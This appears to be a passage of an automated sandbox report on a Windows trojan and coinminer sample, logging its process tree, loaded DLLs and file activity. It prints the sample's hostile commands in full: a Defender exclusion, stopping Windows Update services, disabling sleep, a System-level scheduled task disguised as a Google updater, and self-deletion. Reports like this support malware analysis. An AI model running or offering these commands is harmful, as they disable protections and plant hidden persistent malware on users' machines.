Source: Microsoft-Windows-SMBServer%4Operational.evtx.40.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.40.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.40.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.40.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@54/79@1/1

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

22_2_00007FF723DE2328

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

22_2_00007FF723DE1AC4

Source: C:\Windows\System32\dialer.exe

22_2_00007FF723DE2328

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8104

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

Jump to behavior

Source: zufmUwylvo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zufmUwylvo.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zufmUwylvo.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\zufmUwylvo.exe "C:\Users\user\Desktop\zufmUwylvo.exe"
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8104 -s 2528
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: zufmUwylvo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zufmUwylvo.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC32000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
